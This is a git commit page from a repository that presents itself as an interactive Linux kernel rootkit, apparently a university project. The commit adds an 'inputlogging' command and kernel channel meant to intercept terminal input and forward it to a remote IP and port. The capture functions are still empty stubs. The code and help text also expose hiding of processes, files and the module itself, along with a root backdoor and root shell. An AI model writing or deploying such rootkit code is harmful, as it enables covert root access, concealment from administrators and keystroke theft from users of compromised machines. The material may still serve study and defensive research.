linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 690697be6d8195bff6893781c68c73b43b62fd42
parent 47defaced1d5f0c9a42c470cc36cab906b20a710
Author: deurzen <m.deurzen@tum.de>
Date:   Fri, 11 Dec 2020 23:12:04 +0100

initial input logging code

Diffstat:

Msrc/channel.c | 34++++++++++++++++++++++++++++++++++


Msrc/channel.h | 1+


Msrc/g7.c | 1+


Asrc/inputlog.c | 13+++++++++++++


Asrc/inputlog.h | 7+++++++


Msrc/ioctl.h | 1+


Msrc/rkctl/rkctl.c | 54+++++++++++++++++++++++++++++++++++-------------------


Msrc/rkctl/rkctl.h | 3++-


Msrc/rootkit.h | 1+


9 files changed, 95 insertions(+), 20 deletions(-)

diff --git a/src/channel.c b/src/channel.c
@@ -1,3 +1,4 @@
+#include <linux/string.h>
 #include <linux/kernel.h>
 #include <linux/module.h>
 #include <linux/uaccess.h>
@@ -11,6 +12,7 @@
 #include "openhide.h"
 #include "backdoor.h"
 #include "pidhide.h"
+#include "inputlog.h"
 #include "ioctl.h"
 #include "rootkit.h"
 
@@ -30,6 +32,7 @@ report_channels(void)
     DEBUG_NOTICE("%-24s %#10lx\n", "HIDEPID",  G7_PIDHIDE);
     DEBUG_NOTICE("%-24s %#10lx\n", "BACKDOOR", G7_BACKDOOR);
     DEBUG_NOTICE("%-24s %#10lx\n", "TOGGLEBD", G7_TOGGLEBD);
+    DEBUG_NOTICE("%-24s %#10lx\n", "LOGGING",  G7_LOGGING);
     DEBUG_NOTICE("-----------------------------------\n");
 }
 
@@ -44,6 +47,7 @@ detect_channel(unsigned cmd)
     case G7_PIDHIDE:  return (channel_t){ "HIDEPID",  handle_pidhide  };
     case G7_BACKDOOR: return (channel_t){ "BACKDOOR", handle_backdoor };
     case G7_TOGGLEBD: return (channel_t){ "TOGGLEBD", handle_togglebd };
+    case G7_LOGGING:  return (channel_t){ "LOGGING",  handle_logging  };
     }
 
     return (channel_t){ "unknown", NULL };
@@ -227,3 +231,33 @@ handle_togglebd(unsigned long arg)
 
     return 0;
 }
+
+int
+handle_logging(unsigned long arg)
+{
+    char buf[BUFLEN];
+    const char *sarg = (const char *)arg;
+
+    if (!sarg) {
+        unlog_input();
+        rootkit.logging_input = 0;
+
+        DEBUG_NOTICE("[g7] inputlogging off\n");
+    } else if (!copy_from_user(buf, sarg, BUFLEN) && strstr(buf, ":")) {
+        if (!rootkit.logging_input) {
+            DEBUG_NOTICE("[g7] inputlogging on\n");
+        } else
+            unlog_input();
+
+        char *port = buf;
+        char *ip = strsep(&port, ":");
+
+        log_input(ip, port);
+        rootkit.logging_input = 1;
+
+        DEBUG_INFO("[g7] forwarding stdin to socket %s:%s\n", ip, port);
+    } else
+        return -ENOTTY;
+
+    return 0;
+}
diff --git a/src/channel.h b/src/channel.h
@@ -17,5 +17,6 @@ int handle_openhide(unsigned long);
 int handle_pidhide(unsigned long);
 int handle_backdoor(unsigned long);
 int handle_togglebd(unsigned long);
+int handle_logging(unsigned long);
 
 #endif//_GROUP7_CHANNEL_H
diff --git a/src/g7.c b/src/g7.c
@@ -44,6 +44,7 @@ rootkit_t rootkit = {
     .hiding_files  = true,
     .hiding_open   = true,
     .hiding_pids   = true,
+    .logging_input = true,
     .backdoor = BD_TTY,
 };
 
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -0,0 +1,13 @@
+#include "inputlog.h"
+
+void
+log_input(const char *ip, const char *port)
+{
+
+}
+
+void
+unlog_input(void)
+{
+
+}
diff --git a/src/inputlog.h b/src/inputlog.h
@@ -0,0 +1,7 @@
+#ifndef _GROUP7_INPUTLOG_H
+#define _GROUP7_INPUTLOG_H
+
+void log_input(const char *, const char *);
+void unlog_input(void);
+
+#endif//_GROUP7_INPUTLOG_H
diff --git a/src/ioctl.h b/src/ioctl.h
@@ -11,5 +11,6 @@
 #define G7_PIDHIDE  _IOR(G7_MAGIC_NUMBER, 0x4, char *)
 #define G7_BACKDOOR _IOR(G7_MAGIC_NUMBER, 0x5, char *)
 #define G7_TOGGLEBD _IOR(G7_MAGIC_NUMBER, 0x6, char *)
+#define G7_LOGGING  _IOR(G7_MAGIC_NUMBER, 0x7, char *)
 
 #endif//_GROUP7_IOCTL_H
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
@@ -73,6 +73,25 @@ parse_input(int argc, char **argv)
         }
     }
 
+    if (ARGVCMP(1, "hidepid")) {
+        ASSERT_ARGC(3, "hidepid <add | rm> <PID>");
+
+        long arg;
+        if ((arg = strtol(argv[3], NULL, 10))) {
+            if (ARGVCMP(2, "add"))
+                return (cmd_t){ handle_pidhide, (void *)(arg) };
+
+            if (ARGVCMP(2, "rm"))
+                return (cmd_t){ handle_pidhide, (void *)((-1) * (arg)) };
+        } else {
+            fprintf(stderr, "%s: invalid pid `%s`\n", progname, argv[3]);
+            exit(1);
+        }
+    }
+
+    if (ARGVCMP(1, "hidepid-off"))
+            return (cmd_t){ handle_pidhide, (void *)0 };
+
     if (ARGVCMP(1, "backdoor")) {
         ASSERT_ARGC(2, "backdoor <execve_command>");
         return (cmd_t){ handle_backdoor, (void *)argv[2] };
@@ -94,25 +113,15 @@ parse_input(int argc, char **argv)
     if (ARGVCMP(1, "backdoor-off"))
             return (cmd_t){ handle_togglebd, (void *)0 };
 
-    if (ARGVCMP(1, "hidepid")) {
-        ASSERT_ARGC(3, "hidepid <add | rm> <PID>");
+    if (ARGVCMP(1, "inputlogging")) {
+        ASSERT_ARGC(3, "inputlogging <ip> <port>");
 
-        long arg;
-        if ((arg = strtol(argv[3], NULL, 10))) {
-            if (ARGVCMP(2, "add"))
-                return (cmd_t){ handle_pidhide, (void *)(arg) };
+        char *socket = (char *)malloc(BUFLEN);
+        snprintf(socket, BUFLEN, "%s:%s", argv[2], argv[3]);
 
-            if (ARGVCMP(2, "rm"))
-                return (cmd_t){ handle_pidhide, (void *)((-1) * (arg)) };
-        } else {
-            fprintf(stderr, "%s: invalid pid `%s`\n", progname, argv[3]);
-            exit(1);
-        }
+        return (cmd_t){ handle_logging, (void *)socket };
     }
 
-    if (ARGVCMP(1, "hidepid-off"))
-            return (cmd_t){ handle_pidhide, (void *)0 };
-
     help();
     exit(1);
 }
@@ -142,6 +151,12 @@ handle_openhide(void *arg)
 }
 
 int
+handle_pidhide(void *arg)
+{
+    return issue_ioctl(G7_PIDHIDE, (const char *)arg);
+}
+
+int
 handle_backdoor(void *arg)
 {
     return issue_ioctl(G7_BACKDOOR, (const char *)arg);
@@ -173,9 +188,9 @@ handle_togglebd(void *arg)
 }
 
 int
-handle_pidhide(void *arg)
+handle_logging(void *arg)
 {
-    return issue_ioctl(G7_PIDHIDE, (const char *)arg);
+    return issue_ioctl(G7_LOGGING, (const char *)arg);
 }
 
 int
@@ -206,9 +221,10 @@ help()
     printf("%-38s %s\n", "unload", "gracefully unload the rootkit module");
     printf("%-38s %s\n", "modhide <on | off>", "{,un}hide rootkit module");
     printf("%-38s %s\n", "filehide [open] <toggle | on | off>", "{,un}hide [open] files");
+    printf("%-38s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
     printf("%-38s %s\n", "backdoor <execve_command>", "exec a command as root");
     printf("%-38s %s\n", "shell", "obtain a shell as root");
-    printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or tty (1)");
+    printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
     printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
-    printf("%-38s %s\n", "hidepid <add | rm> <PID>", "{,un}hide a process");
+    printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
 }
diff --git a/src/rkctl/rkctl.h b/src/rkctl/rkctl.h
@@ -24,9 +24,10 @@ int handle_ping(void *);
 int handle_modhide(void *);
 int handle_filehide(void *);
 int handle_openhide(void *);
+int handle_pidhide(void *);
 int handle_backdoor(void *);
 int handle_shellbd(void *);
 int handle_togglebd(void *);
-int handle_pidhide(void *);
+int handle_logging(void *);
 
 #endif//_GROUP7_RKCTL_H
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -15,6 +15,7 @@ typedef struct {
     bool hiding_files;
     bool hiding_pids;
     bool hiding_open;
+    bool logging_input;
     bd_state_t backdoor;
 } rootkit_t;